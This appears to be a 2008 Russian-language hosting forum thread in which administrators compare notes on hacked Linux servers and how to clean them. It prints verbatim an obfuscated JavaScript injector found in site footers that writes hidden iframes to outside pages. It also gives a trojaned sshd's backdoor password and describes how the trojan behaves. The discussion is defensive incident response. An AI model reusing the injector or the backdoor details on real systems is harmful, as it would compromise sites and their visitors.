Опять поламали

Пересмотри все файлы на серве, может обноружишь чужеродный скрипт "шелл".

хех, вот и моя очередь пришла
ат3 никогда не стояло, директадмина тоже
ось Debian
в netstat вижу по ssh соединение с 99.116.232.72 (что это? это не мое)
кстати, случай не еденичный совсем
http://rightroad.net/forum/index.php?showtopic=23

п.с. и вот такую хрень в футерах всех пхп и нтмл (где есть теги </html> </body>) файлов добавили

<скрипт>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </скрипт>
</html> </body><html><body>
<скрипт>var source ="=jgsbnf!tsd>(iuuq;00qsfwfewtfn234/do0360joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </скрипт>
</body></html> <html> <body><скрипт>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </скрипт>
</html> </body>
</html> <html> <body><скрипт>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </скрипт>

Последний раз редактировалось: awm_mark (24/10/08 в 06:55), всего редактировалось 4 раз(а)

Бля пошел проверять свои центосы. Вообще в центосе я говорил - дохрена чего открыто по дефалту. Прокмапы, РПЦ, купсы всякие....

ку?

http://www.opennet.ru/opennews/art.shtml?num=18359

вобщем тут выход только 1 - формат дисков, реинстал, и осторожно с бэкапами

Pentarh писал:

Бля пошел проверять свои центосы. Вообще в центосе я говорил - дохрена чего открыто по дефалту. Прокмапы, РПЦ, купсы всякие....

ну веть никто не мешает его выключить.
кроме того у центоса дефолтный фаервол все дефолтные приложения как раз и прикрывает.

P.S.
непойму для чего на рабочем сервере cups?
даже если он нужен как зависисмость (в CentOS5 его фиг удалишь нормально) - никто же не мешает его выключить. хотябы чтобы память не занимал бестолку.

проверил сейчас 72 своих центоса - всё ок ...

awm_mark писал:

вобщем тут выход только 1 - формат дисков, реинстал, и осторожно с бэкапами

ну а если при реинстале ты поставишь ту же дыру что и изначально? веть 99.999% что ты будешь ставить ТОТ ЖЕ софт и ТЕ ЖЕ скрипты.

IMHO не факт что ломают (воруют) пароль на рута(любого локального юзера) - поэтому прикрытие фаерволом/тсп-враппером не есть выход из положения.

Soft-Com писал:

ну веть никто не мешает его выключить.

ну я его и выключаю руками после сетапа

Soft-Com писал:

кроме того у центоса дефолтный фаервол все дефолтные приложения как раз и прикрывает.

Не видел я там дефолтного файрвола

Soft-Com писал:

непойму для чего на рабочем сервере cups?

Я тоже не пойму нахуя его включают в дефолт + еще штук 5-10 стартап скриптов левых

У моих центососв тоже все впорядке.

Pentarh писал:

У моих центососв тоже все впорядке.

+1 не в ОСи дело, дело в софте.

сups в центосе слушает по дефолту от рута на удп 631
udp 0 0 0.0.0.0:631 0.0.0.0:* 19337/cupsd

Soft-Com писал:

ну а если при реинстале ты поставишь ту же дыру что и изначально? веть 99.999% что ты будешь ставить ТОТ ЖЕ софт и ТЕ ЖЕ скрипты. IMHO не факт что ломают (воруют) пароль на рута(любого локального юзера) - поэтому прикрытие фаерволом/тсп-враппером не есть выход из положения.

легче переинсталить и ограничить доступ по айпи
т.к. почистить со 100% гарантией получится ли ?? ведь достаточно даже вэбшелл один пропустить, о руткитах я вобще молчу. Может тут и есть гуру сетевой безопасности, но думаю что их очень мало.

Soft-Com писал:

+1 не в ОСи дело, дело в софте.

дык и софт у всех разный
может в ядре дело ?? давно обновляли ? я на этом серваке никогда, а зря , счас посмотрел - как в ноябре 2003 года заинсталили, так никто ничего и не трогал там .

п.с. Амхост, почему на тикеты не отвечаете ??? 3 часа уже как отписал

Последний раз редактировалось: awm_mark (24/10/08 в 07:40), всего редактировалось 1 раз

awm_mark, отписал тебе в аську с контакта 1568562, посмотри плс месагу

от вебшеллов спасет мод_секюрити. а руткиты конечно почистить реально, просто намного проще и дешевле систему переустановить.

IMHO потеря производительности, и не факт что поможет.

SELinux от руткитов реально полечит (доказано занусси), но на производительности скажется очень отрицательно.

Soft-Com писал:

awm_mark, отписал тебе в аську с контакта 1568562, посмотри плс месагу

у меня в профайле старый (локнутый) номер, отписал тебе с рабочего 461373470, что там ?

Pentarh писал:

от вебшеллов спасет мод_секюрити. а руткиты конечно почистить реально, просто намного проще и дешевле систему переустановить.

От вебшеллов намного лучше спасают правильно проставленные права доступа. можно конечно насрать в пользовательский тмп, но толку от этого 0%. Еще конешно можно насрать в кэш APC, но это уже высший пилотаж, я экземпляров таким методом закидывающих сплойты еще не встречал.

Проверяйте наличие папки /dev/ssh и подходит ли рутовский пароль KJSA5aHF%^$%^
Это признаки бэкдора на сервере с затрояненым sshd, его надо из исходников пересобрать.

есть такая хуйня, пароль правда другой, лежит в открытом виде в файле backdoor h
Зашел, запустился сразу ранее найденный морфеус рут.
пиздец
Блокировка рута по айпи вообще в этом случае помагает?

Чето все говорят о пока неизвестной дырке в OpenSSH

Давайте поговорим о том, как можно обезопасить ssh кроме файрвола

Эту х-ня исправляет /etc/ssh/sshd_config, компилит свой ssh с трояном. При изменении пароля отправляет его на hostname@ymail.com (можно увидеть мыло в /usr/sbin/ssh в открытом виде), удаляет /root/.bash_history, /var/log/lastlog, /var/log/messages, /var/log/secure. Поможет только перекомпилирование sshd. Для Центос 4 (и наверно 5) можно делать так:
rm -rf /dev/ssh
cd /usr/local/src && wget http://mirror.mcs.anl.gov/openssh/portable/openssh-5.1p1.tar.gz
tar zxf openssh-5.1p1.tar.gz && cd openssh-5.1p1 && ./configure --prefix=/usr --sysconfdir=/etc/ssh && make && make install && service sshd restart

Есть ли смысл делать реинстал на другую систему или лучше ждать пока не найдут, как залезли?
Возможно вообще все гавно вычистить? Я смотрю, каждый день находятся новые файлы.

Переставь ssh, почисти php-shell, смени пароли. Желательно убрать atl3. Вполне реально что взломы прекратятся.

еще yum upgrade поможет )

А какую архитектуру ломают? У меня повсюду amd64 стоит. Стоял сервер голо-установленный с дефолтными настройками и сервисами с ssh на 22 порту. До сих пор не поламали (тьфу-тьфу).

Кстати трой еще прописывается в /etc/rc.local

supphosting.com писал:

Переставь ssh, почисти php-shell, смени пароли. Желательно убрать atl3. Вполне реально что взломы прекратятся.

at3 непричем, ломали сервера и без них, с протонами.